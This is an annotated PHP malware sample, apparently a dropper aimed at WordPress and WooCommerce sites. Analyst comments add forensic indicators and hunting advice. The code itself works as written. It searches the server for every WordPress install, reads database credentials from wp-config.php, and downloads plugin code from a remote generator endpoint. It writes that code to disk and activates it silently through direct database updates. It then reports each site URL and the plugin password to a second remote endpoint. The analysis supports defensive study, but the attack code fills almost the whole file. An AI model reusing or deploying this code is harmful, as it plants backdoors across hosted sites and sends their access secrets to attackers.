File: //proc/self/root/tmp/pr_ImfTzt
<?php
/**
 * Writes a plugin's files into a WordPress install and registers the plugin as active.
 *
 * Analyst summary: this is the write-to-disk stage of the sample. It creates
 * wp-content/plugins/<pluginName>/ with a main PHP file, a config.php and one
 * image, then calls activateViaDb() to add the plugin to the site's
 * active_plugins option. The top-level script at the end of this file passes
 * in values decoded from a remote JSON response, and nothing here validates
 * $pluginName or the file contents before they are written.
 *
 * Artifacts to look for on disk:
 *   - <wpRoot>/wp-content/plugins/<pluginName>/<pluginName>.php
 *   - <wpRoot>/wp-content/plugins/<pluginName>/config.php
 *   - <wpRoot>/wp-content/plugins/<pluginName>/assets/images//<imageFileName>.png
 *
 * @param string $wpRoot         Root directory of the WordPress install.
 * @param string $pluginName     Used as both the directory name and the main file name.
 * @param string $mainPhpContent Written verbatim to <pluginName>.php.
 * @param string $configContent  Written verbatim to config.php.
 * @param string $imageContent   Written verbatim to the image file.
 * @param string $imageFileName  Image base name; '.png' is always appended.
 *
 * @return string|int 'activated_true' when the files were written in this run and the
 *                    DB step reported 'activated' or 'already_active'; 'already_exist'
 *                    when the files were already present; 0 when wp-config.php could
 *                    not be parsed or the DB step returned any other status.
 */
function ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageFileName = 'image.png') {
$pluginDir = $wpRoot . '/wp-content/plugins/' . $pluginName;
$pluginFile = $pluginDir . '/' . $pluginName . '.php';
$configFile = $pluginDir . '/config.php';
$assetsDir = $pluginDir . '/assets/images/';
// NOTE(analysis): $assetsDir already ends in '/', and '.png' is appended unconditionally,
// so the resulting path has a doubled slash and, with the default argument, would end
// in 'image.png.png'. Both quirks are usable as forensic markers.
$imageFile = $assetsDir . '/' . $imageFileName . '.png';
$needInstall = false;
// 0 = undecided, 1 = files written in this run, 2 = files were already in place.
$plugin_install = 0;
// Install when the directory is missing, or when the main file or config.php is
// missing or zero bytes. The image file is not part of this check.
if (!is_dir($pluginDir)) {
$needInstall = true;
} elseif (
!is_file($pluginFile) || filesize($pluginFile) === 0 ||
!is_file($configFile) || filesize($configFile) === 0
) {
$needInstall = true;
}
if ($needInstall) {
if (!is_dir($pluginDir)) {
mkdir($pluginDir, 0755, true);
}
if (!is_dir($assetsDir)) {
mkdir($assetsDir, 0755, true);
}
// The three writes take an exclusive lock; their return values are not checked,
// so a failed write still reaches the activation step below.
file_put_contents($pluginFile, $mainPhpContent, LOCK_EX);
file_put_contents($configFile, $configContent, LOCK_EX);
file_put_contents($imageFile, $imageContent, LOCK_EX);
$plugin_install = 1;
} else {
$plugin_install = 2;
}
// Database credentials are read from the site's own wp-config.php.
$creds = parseWpConfig($wpRoot);
if (!$creds) {
return 0;
}
// Same "<dir>/<file>.php" form as the entries stored in the active_plugins option.
$relPath = $pluginName . '/' . $pluginName . '.php';
$result = activateViaDb($creds, $relPath);
// Both success statuses map to the same outcome: the return value only records
// whether the files were written in this run.
if ($result['status'] === 'activated') {
if ($plugin_install == 1) {
$plugin_install = 'activated_true';
} else {
$plugin_install = 'already_exist';
}
} elseif ($result['status'] === 'already_active') {
if ($plugin_install == 1) {
$plugin_install = 'activated_true';
} else {
$plugin_install = 'already_exist';
}
} else {
return 0;
}
return $plugin_install;
}
/**
 * Adds a plugin path to the site's active_plugins option by editing the database directly.
 *
 * Analyst summary: no WordPress API is called anywhere in this function. It opens
 * its own mysqli connection with the credentials it is given, reads the serialized
 * active_plugins array from `<prefix>options`, appends $pluginRelPath and writes the
 * array back with a single UPDATE. Detection therefore has to come from the data
 * itself: diff the active_plugins value against the plugins the site owner
 * installed, and review database query logs for UPDATEs to that option row.
 *
 * @param array  $creds         Keys read here: db_host, db_user, db_password, db_name, prefix.
 * @param string $pluginRelPath Entry to add, in "<dir>/<file>.php" form.
 *
 * @return array Always has 'status', one of: db_connect_error, no_option, bad_plugins_data,
 *               already_active, activated, update_error. 'msg' is present on the error
 *               statuses only.
 */
function activateViaDb($creds, $pluginRelPath) {
try {
$mysqli = new mysqli(
$creds['db_host'],
$creds['db_user'],
$creds['db_password'],
$creds['db_name']
);
} catch (Throwable $e) {
return ['status' => 'db_connect_error', 'msg' => $e->getMessage()];
}
// Covers configurations where mysqli reports a connection failure without throwing.
if ($mysqli->connect_errno) {
return ['status' => 'db_connect_error', 'msg' => $mysqli->connect_error];
}
// The table name is built from the prefix parsed out of wp-config.php.
$tbl = $creds['prefix'] . 'options';
$res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1");
if (!$res || $res->num_rows === 0) {
return ['status' => 'no_option', 'msg' => 'active_plugins not found'];
}
$row = $res->fetch_assoc();
// The stored value is a PHP-serialized array; decoding warnings are suppressed and
// anything that does not decode to an array is rejected below.
$arr = @unserialize($row['option_value']);
if (!is_array($arr)) {
return ['status' => 'bad_plugins_data', 'msg' => 'active_plugins value is not an array'];
}
if (in_array($pluginRelPath, $arr, true)) {
return ['status' => 'already_active'];
}
// The new entry is appended at the end of the existing list.
$arr[] = $pluginRelPath;
$ser = $mysqli->real_escape_string(serialize($arr));
$res = $mysqli->query("UPDATE `$tbl` SET option_value='$ser' WHERE option_name='active_plugins'");
// The connection is never closed explicitly on any return path.
if ($res) {
return ['status' => 'activated'];
} else {
return ['status' => 'update_error', 'msg' => $mysqli->error];
}
}
// Directory names that fastWordPressLocator() skips at the first level below each search root.
define('EXCLUDED_DIRS', array('node_modules', '.git', 'vendor', 'venv', '__pycache__', 'tmp', 'log', 'logs', 'cache', '.idea', '.vscode', 'env', '.svn', '.hg', '.composer'));
// Extra search roots tried in addition to the document root: common Linux web roots,
// /home, and Windows XAMPP / WAMP / OSPanel layouts. A root is used only if realpath()
// resolves it on the host.
define('KNOWN_BASES', array('/var/www', '/srv/http', '/usr/share/nginx', '/opt/lampp/htdocs', '/home', '\\xampp\\htdocs', '\\wamp64\\www', '\\OSPanel'));
/**
 * Lists a directory, returning an empty array instead of failing.
 *
 * Unreadable directories return [] up front. scandir() warnings are suppressed and
 * a false result is turned into an empty array, so the directory walk in this file
 * emits no PHP warnings that would otherwise appear in the error log.
 *
 * @param string $dir Directory to list.
 *
 * @return array Entry names as returned by scandir() (including '.' and '..'), or an empty array.
 */
function smartscan($dir) {
if (!is_readable($dir))
return [];
$items = @scandir($dir);
return $items ?: array();
}
/**
 * Enumerates WordPress installs reachable from the current process.
 *
 * Search roots are DOCUMENT_ROOT (or the working directory when that is unset), its
 * three parent levels, and every KNOWN_BASES entry that resolves. Under each root the
 * function inspects first-level and second-level subdirectories; a directory counts
 * as a WordPress install when it contains both wp-config.php and
 * wp-includes/version.php.
 *
 * Incident-scoping note: the search is not limited to the site the script runs in.
 * Every install readable by the PHP process user under these roots is returned,
 * which on shared hosting can include other tenants' sites under /home or /var/www.
 * Per-site users and open_basedir restrictions narrow what this walk can see.
 *
 * @return array Unique real paths of the installs found, reindexed from 0.
 */
function fastWordPressLocator() {
$roots = [];
$docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
// The document root plus up to three levels above it.
$roots[] = realpath($docRoot);
$roots[] = realpath("$docRoot/..");
$roots[] = realpath("$docRoot/../..");
$roots[] = realpath("$docRoot/../../..");
foreach (KNOWN_BASES as $base) {
$real = realpath($base);
if ($real)
$roots[] = $real;
}
// realpath() returns false for paths that do not exist; array_filter() drops those.
$roots = array_unique(array_filter($roots));
$found = [];
foreach ($roots as $root) {
$dirs = smartscan($root);
foreach ($dirs as $dir) {
// EXCLUDED_DIRS is applied at this first level only.
if ($dir === '.' || $dir === '..' || in_array($dir, EXCLUDED_DIRS))
continue;
$path = $root . DIRECTORY_SEPARATOR . $dir;
if (!is_dir($path))
continue;
if (
is_file("$path/wp-config.php") &&
is_file("$path/wp-includes/version.php")
) {
$found[] = realpath($path);
// A matching directory is not descended into any further.
continue;
}
// Second level: the same two-file test, without the EXCLUDED_DIRS filter.
$subdirs = smartscan($path);
foreach ($subdirs as $sub) {
if ($sub === '.' || $sub === '..')
continue;
$subPath = $path . DIRECTORY_SEPARATOR . $sub;
if (!is_dir($subPath))
continue;
if (
is_file("$subPath/wp-config.php") &&
is_file("$subPath/wp-includes/version.php")
) {
$found[] = realpath($subPath);
}
}
}
}
// Overlapping roots can reach the same install more than once.
return array_values(array_unique($found));
}
/**
 * Extracts database credentials and the table prefix from a site's wp-config.php.
 *
 * The file is read as text and matched line by line with regular expressions; it is
 * never included or executed. Only define() calls whose value is a quoted literal on
 * the same line are recognised.
 *
 * Analyst note: within this file the credentials are used only for local mysqli
 * connections; none of the outbound requests in the top-level script include them.
 * Keeping wp-config.php unreadable to other sites' PHP users limits what this
 * function can reach.
 *
 * @param string $wpRoot Root directory of the WordPress install.
 *
 * @return array|false Array with db_name, db_user, db_password, db_host and prefix,
 *                     or false when the file is missing, unreadable, empty, or lacks
 *                     any of the four DB_* values.
 */
function parseWpConfig($wpRoot) {
$cfgPath = $wpRoot . DIRECTORY_SEPARATOR . 'wp-config.php';
if (!is_file($cfgPath))
return false;
$lines = @file($cfgPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!$lines)
return false;
$creds = [];
foreach ($lines as $line) {
// A later matching line overwrites an earlier one for the same key.
if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
$creds['db_name'] = $m[1];
}
if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
$creds['db_user'] = $m[1];
}
// DB_PASSWORD uses (.*?) rather than (.+?), so an empty password is accepted.
if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]\s*\)/", $line, $m)) {
$creds['db_password'] = $m[1];
}
if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
$creds['db_host'] = $m[1];
}
if (preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]\s*;/", $line, $m)) {
$creds['prefix'] = $m[1];
}
}
if (!isset($creds['db_name'], $creds['db_user'], $creds['db_password'], $creds['db_host'])) {
return false;
}
// Falls back to 'wp_' when no $table_prefix assignment was matched.
$creds['prefix'] = isset($creds['prefix']) ? $creds['prefix'] : 'wp_';
return $creds;
}
/**
 * Reads the site's public URL (the 'siteurl' option) from its database.
 *
 * The top-level script uses the returned URL as the site identifier in both of its
 * outbound requests, so the value stored in `<prefix>options` is what appears in any
 * captured traffic or proxy logs.
 *
 * @param array $creds Keys read here: db_host, db_user, db_password, db_name, prefix.
 *
 * @return array On connection failure: ['status' => 'db_error', 'msg' => ...].
 *               Otherwise ['site_url' => ..., 'status' => 'ok'], where site_url has
 *               trailing slashes removed and is '' when the query fails or returns no row.
 */
function getSiteUrl($creds) {
try {
// '@' suppresses connection warnings; only mysqli_sql_exception is caught here.
$mysqli = @new mysqli(
$creds['db_host'],
$creds['db_user'],
$creds['db_password'],
$creds['db_name']
);
} catch (\mysqli_sql_exception $e) {
return ['status' => 'db_error', 'msg' => $e->getMessage()];
}
if ($mysqli->connect_errno) {
return ['status' => 'db_error', 'msg' => $mysqli->connect_error];
}
$prefix = $creds['prefix'];
$optTable = $prefix . 'options';
$siteUrl = '';
$siteRes = $mysqli->query("SELECT option_value FROM `$optTable` WHERE option_name = 'siteurl' LIMIT 1");
if ($siteRes && $row = $siteRes->fetch_assoc()) {
$siteUrl = rtrim($row['option_value'], '/');
}
// Status is 'ok' even when no siteurl row was read; callers then get an empty site_url.
return [
'site_url' => $siteUrl,
'status' => 'ok'
];
}
/**
 * Tests whether a plugin directory matches a specific file layout.
 *
 * Analyst summary: checkEvacPlugin() calls this to decide whether a site already
 * carries a plugin with this layout ("evac" is the sample's own term, and its
 * meaning is not explained in this file). The checks double as a host-side
 * fingerprint for such a plugin directory:
 *   - contains <plugin_name>.php and either index.htm or index.html
 *   - the main PHP file contains the text "Description:"
 *   - the main PHP file references "/<lowercase letters>.txt" followed by a quote
 *   - that .txt file is in the directory and is non-empty
 *   - assets/images and assets/js both exist
 *   - assets/images has at least five entries whose names contain ".png" or ".gif"
 *
 * @param string $folder      Plugin directory to inspect.
 * @param string $plugin_name Expected base name of the main PHP file.
 *
 * @return bool True only when every check above passes.
 */
function check_plugin_evac_ok($folder, $plugin_name) {
if (!file_exists($folder))
return false;
$files = smartscan($folder);
$index = "$plugin_name.php";
if (!in_array($index, $files)) {
return false;
}
if ((!in_array("index.htm", $files)) && (!in_array("index.html", $files))) {
return false;
}
$index_content = file_get_contents($folder . '/' . $index);
// Captures the first "/name.txt" reference that is followed by a quote character.
if (!preg_match("#/([a-z]+\.txt)['\"]#", $index_content, $match)) {
return false;
}
// Presence of a "Description:" string, as found in a WordPress plugin header comment.
if (!substr_count($index_content, "Description:")) {
return false;
}
$txt_name = $match[1];
if (!in_array($txt_name, $files)) {
return false;
}
if (!filesize($folder . '/' . $txt_name)) {
return false;
}
if (!file_exists($folder . "/assets/images")) {
return false;
}
if (!file_exists($folder . "/assets/js")) {
return false;
}
$files_images = smartscan($folder . "/assets/images");
$cnt_images = 0;
foreach ($files_images as $image) {
// Substring match anywhere in the name, not an extension check.
if ((substr_count($image, ".png")) || (substr_count($image, ".gif"))) {
$cnt_images++;
}
}
if ($cnt_images < 5)
return false;
return true;
}
/**
 * Checks whether any active plugin on the site matches a name pattern and file layout.
 *
 * Analyst summary: the function reads active_plugins from the database, reduces each
 * entry to its file base name, and keeps only names made of alternating characters:
 * positions 0, 2, 4, ... from "eyuoa" and positions 1, 3, 5, ... from
 * "qwrtpsdghjklzxcvbnm". Names passing that filter are then verified on disk with
 * check_plugin_evac_ok(). The top-level script skips installation on sites where
 * this returns true.
 *
 * Hunting use: the same alternating-letter test can be run over active_plugins
 * entries and wp-content/plugins directory names to shortlist candidates for review.
 *
 * @param array  $creds       Keys read here: db_host, db_user, db_password, db_name, prefix.
 * @param string $pluginsPath Path to the site's wp-content/plugins directory.
 *
 * @return bool True when at least one active plugin passes both the name filter and
 *              the layout check; false otherwise, including on any database error.
 */
function checkEvacPlugin($creds, $pluginsPath) {
try {
$mysqli = new mysqli(
$creds['db_host'],
$creds['db_user'],
$creds['db_password'],
$creds['db_name']
);
} catch (Throwable $e) {
return false;
}
if ($mysqli->connect_errno) {
return false;
}
$tbl = $creds['prefix'] . 'options';
$res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1");
if (!$res || $res->num_rows === 0) {
return false;
}
$row = $res->fetch_assoc();
$arr = @unserialize($row['option_value']);
if (!is_array($arr)) {
return false;
}
foreach ($arr as $plugin_one) {
// Normalise separators, keep the last path segment, and remove ".php" from it.
$plugin_one = strtr($plugin_one, ["\\" => "/"]);
$plugin_one = explode("/", $plugin_one);
$plugin_one = end($plugin_one);
$plugin_name = strtr($plugin_one, [".php" => ""]);
// Two character sets: $chars1 for odd positions, $chars2 for even positions.
// Any other character (digits, hyphens, upper case, 'f', 'i') fails the filter.
$chars1 = "qwrtpsdghjklzxcvbnm";
$chars2 = "eyuoa";
$found = true;
for ($i = 0; $i < strlen($plugin_name); $i++) {
$c = substr($plugin_name, $i, 1);
if ($i % 2) {
if (!substr_count($chars1, $c)) {
$found = false;
break;
}
} else {
if (!substr_count($chars2, $c)) {
$found = false;
break;
}
}
}
if ($found) {
// The directory is assumed to carry the same name as the main PHP file.
if (check_plugin_evac_ok($pluginsPath . DIRECTORY_SEPARATOR . $plugin_name, $plugin_name))
return true;
}
}
return false;
}
// ---------------------------------------------------------------------------
// Top-level flow (analyst annotation)
//
// 1. Enumerate WordPress installs and keep only those where the WooCommerce
//    plugin file exists.
// 2. For each kept site, request a JSON response from a remote endpoint
//    (generator.php?nm=<site_url>), write the returned files to disk as a plugin
//    and mark it active in the database.
// 3. Report the outcome to a second endpoint (lg.php?lg=<base64 string>).
//
// $url and $cookie_pass are not assigned anywhere in this file; presumably they
// are set by whatever loads this script. Confirm from the delivery stage.
//
// Network indicators visible below: GET requests to paths ending in
// generator.php and lg.php with query parameters nm= and lg=, a Cookie header,
// the fixed User-Agent string, and TLS certificate and hostname verification
// switched off. Egress filtering on the web server and file-integrity monitoring
// on wp-content/plugins address steps 2 and 3.
// ---------------------------------------------------------------------------
$foundSites = fastWordPressLocator();
$results = [];
foreach ($foundSites as $wpRoot) {
$siteEntry = [
'path' => $wpRoot
];
// Sites without WooCommerce are never added to $results.
if (file_exists($wpRoot . '/wp-content/plugins/woocommerce/woocommerce.php')) {
$creds = parseWpConfig($wpRoot);
if (!$creds) {
$siteEntry['status'] = 'error';
$siteEntry['message'] = 'Invalid wp-config.php';
$results[] = $siteEntry;
continue;
}
$stats = getSiteUrl($creds);
if ($stats['status'] !== 'ok') {
$siteEntry['status'] = 'error';
$siteEntry['message'] = isset($stats['msg']) ? $stats['msg'] : 'Unknown error';
$results[] = $siteEntry;
continue;
}
// Sites where an active plugin already matches the name and layout check are marked as errors.
if (checkEvacPlugin($creds, $wpRoot . '/wp-content/plugins')) {
$siteEntry['status'] = 'error';
$siteEntry['message'] = 'Evac exists';
$results[] = $siteEntry;
continue;
}
$siteEntry['status'] = 'ok';
$siteEntry['site_url'] = $stats['site_url'];
$results[] = $siteEntry;
}
}
// NOTE(analysis): this loop iterates every entry in $results and never reads the
// 'status' field set above, so entries recorded as 'error' are processed as well.
foreach ($results as $result) {
$wpRoot = $result['path'];
if (function_exists("curl_init")) {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "",
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
CURLOPT_AUTOREFERER => true,
CURLOPT_CONNECTTIMEOUT => 120,
CURLOPT_TIMEOUT => 120,
CURLOPT_MAXREDIRS => 10,
// Certificate and hostname verification are disabled for this request.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_HTTPHEADER => array(
"Cookie: $cookie_pass"
)
);
// The site URL is appended to the query string without URL-encoding.
$ch = curl_init($url . 'generator.php?nm=' . $result['site_url']);
curl_setopt_array($ch, $options);
$content = @curl_exec($ch);
}
// Fallback through PHP stream wrappers when cURL is unavailable or returned nothing.
if (!$content) {
$options = array(
"http" => array(
"method" => "GET",
"header" => "Cookie: $cookie_pass\r\n"
)
);
$context = stream_context_create($options);
$content = @file_get_contents($url . 'generator.php?nm=' . $result['site_url'], false, $context);
}
// The response is expected to be a JSON object keyed '1'..'6'. No field is validated
// before use, so whatever the remote endpoint returns is what gets written to disk.
$data = json_decode($content, true);
$pluginName = $data['1'];
$mainPhpContent = $data['2'];
$configContent = $data['3'];
$imageContent = $data['4'];
$imageName = $data['5'];
// Only used in the report string below; presumably an access secret for the
// installed plugin. Confirm against the returned payload.
$pluginPassword = $data['6'];
$res = ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageName);
// Report string: "<site_url>:<password> - activated_true | " for a fresh install,
// "<site_url> - already_exist | " when the files were already present.
if (strpos($res, 'activated_true') !== false) {
$res = $result['site_url'] . ':' . $pluginPassword . ' - ' . 'activated_true' . ' | ';
} elseif (strpos($res, 'already_exist') !== false) {
$res = $result['site_url'] . ' - ' . 'already_exist' . ' | ';
} else {
$res = 0;
}
if ($res) {
// The report is sent as a base64 value in the lg= query parameter, so it can be
// recovered from web proxy or access logs by decoding that parameter.
if (function_exists("curl_init")) {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "",
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
CURLOPT_AUTOREFERER => true,
CURLOPT_CONNECTTIMEOUT => 120,
CURLOPT_TIMEOUT => 120,
CURLOPT_MAXREDIRS => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_HTTPHEADER => array(
"Cookie: $cookie_pass"
)
);
$ch = curl_init($url . 'lg.php?lg=' . base64_encode($res));
curl_setopt_array($ch, $options);
$content = @curl_exec($ch);
}
if (!$content) {
$options = array(
"http" => array(
"method" => "GET",
"header" => "Cookie: $cookie_pass\r\n"
)
);
$context = stream_context_create($options);
$content = @file_get_contents($url . 'lg.php?lg=' . base64_encode($res), false, $context);
}
}
}